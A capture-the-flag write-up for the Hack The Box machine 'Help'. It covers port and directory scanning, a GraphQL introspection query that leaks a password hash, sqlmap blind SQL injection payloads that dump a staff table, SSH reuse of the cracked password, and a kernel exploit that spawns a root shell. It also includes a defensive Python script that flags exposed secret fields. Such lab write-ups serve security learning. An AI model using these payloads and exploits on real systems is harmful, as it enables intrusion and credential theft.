Service overview
The machine's IP address is 10.10.10.121. Let's see what nmap shows:
$ nmap -sC -sT -Pn -p1-65535 -oN 10.10.10.121 10.10.10.121
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 08:48 EDT
Nmap scan report for 10.10.10.121
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 38.04 seconds
Add it to /etc/hosts:
$ sudo nano /etc/hosts
10.10.10.121 help.htb
Let's look for other directories on the server:
$ gobuster dir -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://help.htb -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://help.htb
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/07/18 08:59:15 Starting gobuster in directory enumeration mode
===============================================================
/support (Status: 301) [Size: 306] [--> http://help.htb/support/]
Progress: 4848 / 4990 (97.15%)
===============================================================
2023/07/18 08:59:30 Finished
===============================================================
Web
The web server is a standard Apache2 with HelpdeskZ and an API.
GraphQL
On inspection the API turns out to be GraphQL. We follow the pentesting guide. The endpoint address is http://help.htb:3000/graphql. Let's check the data types via an introspection query:
http://help.htb:3000/graphql?query={__schema{types{name,fields{name}}}}
{
"data": {
"__schema": {
"types": [
{
"name": "Query",
"fields": [
{
"name": "user"
}
]
},
{
"name": "User",
"fields": [
{
"name": "username"
},
{
"name": "password"
}
]
},
{
"name": "String",
"fields": null
},
{
"name": "__Schema",
"fields": [
{
"name": "types"
},
{
"name": "queryType"
},
{
"name": "mutationType"
},
{
"name": "subscriptionType"
},
{
"name": "directives"
}
]
},
{
"name": "__Type",
"fields": [
{
"name": "kind"
},
{
"name": "name"
},
{
"name": "description"
},
{
"name": "fields"
},
{
"name": "interfaces"
},
{
"name": "possibleTypes"
},
{
"name": "enumValues"
},
{
"name": "inputFields"
},
{
"name": "ofType"
}
]
},
{
"name": "__TypeKind",
"fields": null
},
{
"name": "Boolean",
"fields": null
},
{
"name": "__Field",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "args"
},
{
"name": "type"
},
{
"name": "isDeprecated"
},
{
"name": "deprecationReason"
}
]
},
{
"name": "__InputValue",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "type"
},
{
"name": "defaultValue"
}
]
},
{
"name": "__EnumValue",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "isDeprecated"
},
{
"name": "deprecationReason"
}
]
},
{
"name": "__Directive",
"fields": [
{
"name": "name"
},
{
"name": "description"
},
{
"name": "locations"
},
{
"name": "args"
}
]
},
{
"name": "__DirectiveLocation",
"fields": null
}
]
}
}
}
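As an added example (not part of the original writeup), a small Python audit script that parses an introspection response like the one above, filters out the GraphQL meta types and built-in scalars, and flags application fields whose names suggest a secret is queryable, which is exactly what revealed User.password here. The two embedded responses are constructed samples, and the sensitive-name list is an assumption.

```python
import json

# Constructed sample: the application-defined part of the introspection
# response above, plus a couple of built-in types that must be filtered out.
SAMPLE_INTROSPECTION = json.loads("""
{"data": {"__schema": {"types": [
  {"name": "Query",    "fields": [{"name": "user"}]},
  {"name": "User",     "fields": [{"name": "username"}, {"name": "password"}]},
  {"name": "String",   "fields": null},
  {"name": "__Schema", "fields": [{"name": "types"}, {"name": "queryType"}]},
  {"name": "Boolean",  "fields": null}
]}}}
""")
# Constructed: what a server with introspection disabled typically answers.
DISABLED_RESPONSE = json.loads(
    '{"errors": [{"message": "GraphQL introspection is not allowed"}]}')

BUILTIN_SCALARS = {"String", "Int", "Float", "Boolean", "ID"}
SENSITIVE_HINTS = ("password", "passwd", "secret", "token", "apikey", "api_key")

def introspection_enabled(response):
    """True if the reply carries a schema; False for an error-only reply."""
    schema = (response.get("data") or {}).get("__schema") or {}
    return isinstance(schema.get("types"), list)

def app_types(response):
    """Map application-defined object types to their field names, dropping
    GraphQL meta types (__Schema, __Type, ...) and built-in scalars."""
    if not introspection_enabled(response):
        return {}
    types = {}
    for t in response["data"]["__schema"]["types"]:
        name = t.get("name", "")
        if name.startswith("__") or name in BUILTIN_SCALARS or not t.get("fields"):
            continue
        types[name] = [f["name"] for f in t["fields"]]
    return types

def sensitive_fields(response):
    """(type, field) pairs whose name suggests a credential or secret."""
    hits = []
    for tname, fields in app_types(response).items():
        hits += [(tname, f) for f in fields
                 if any(h in f.lower() for h in SENSITIVE_HINTS)]
    return hits

if __name__ == "__main__":
    for tname, field in sensitive_fields(SAMPLE_INTROSPECTION):
        print(f"[!] {tname}.{field} is exposed through the public schema")
```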
Let's pull the login and password:
http://help.htb:3000/graphql?query={user{username,password}}
{
"data": {
"user": {
"username": "[email protected]",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}
Check the hash on crackstation.net => [email protected]:godhelpmeplz.
Log in to the system.
SQL Injection
There is a public exploit, https://www.exploit-db.com/exploits/41200, but we'll do it a bit differently. Log into the admin panel, create a ticket and attach any file to it.
Click the download link and save the request in Burp Suite.
Run sqlmap:
$ sqlmap -r download.req
...
[09:51:22] [INFO] checking if the injection point on GET parameter 'param[]' is a false positive
GET parameter 'param[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 487 HTTP(s) requests:
---
Parameter: param[] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: v=view_tickets&action=ticket&param[]=5&param[]=attachment&param[]=1&param[]=7 AND 6765=6765
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: v=view_tickets&action=ticket&param[]=5&param[]=attachment&param[]=1&param[]=7 AND (SELECT 4685 FROM (SELECT(SLEEP(5)))eYfI)
---
[09:51:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
...
$ sqlmap -r download.req -D support -T staff --dump --threads 8
...
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+-----------------------------------------------------+--------------------+------------+------------------------+
| id | email | login | avatar | admin | status | fullname | timezone | username | signature | password | department | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+-----------------------------------------------------+--------------------+------------+------------------------+
| 1 | [email protected] | 1547216217 | NULL | 1 | Enable | Administrator | <blank> | admin | Best regards,\r\nAdministrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | a:1:{i:0;s:1:"1";} | 1543429746 | 0 |
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+-----------------------------------------------------+--------------------+------------+------------------------+
...
SSH
We try to guess the username: admin and shiv don't work, but help does:
$ ssh [email protected]
Welcome1
User flag
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help)(adm)(cdrom)(dip)(www-data)(plugdev)(lpadmin)(sambashare)
help@help:~$ ls
help npm-debug.log user.txt
help@help:~$ cat user.txt
c064bf0aba7dd3d3f40e28620818d8d4
Privilege escalation
Let's check the kernel. It turns out to be old.
$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Exploit: https://www.exploit-db.com/exploits/44298
help@help:/tmp$ nano e.c
help@help:/tmp$ gcc e.c
help@help:/tmp$ ./a.out
task_struct = ffff880036a20e00
uidptr = ffff88003875d504
spawning root shell
root@help:/tmp# id
uid=0(root) gid=0(root) groups=0(root)(adm)(cdrom)(dip)(www-data)(plugdev)(lpadmin)(sambashare)(help)
Root flag
root@help:/tmp# cd /root
root@help:/root# ls
root.txt
root@help:/root# cat root.txt
3bbc62707113b05ce9cbee6cc2f9f1b5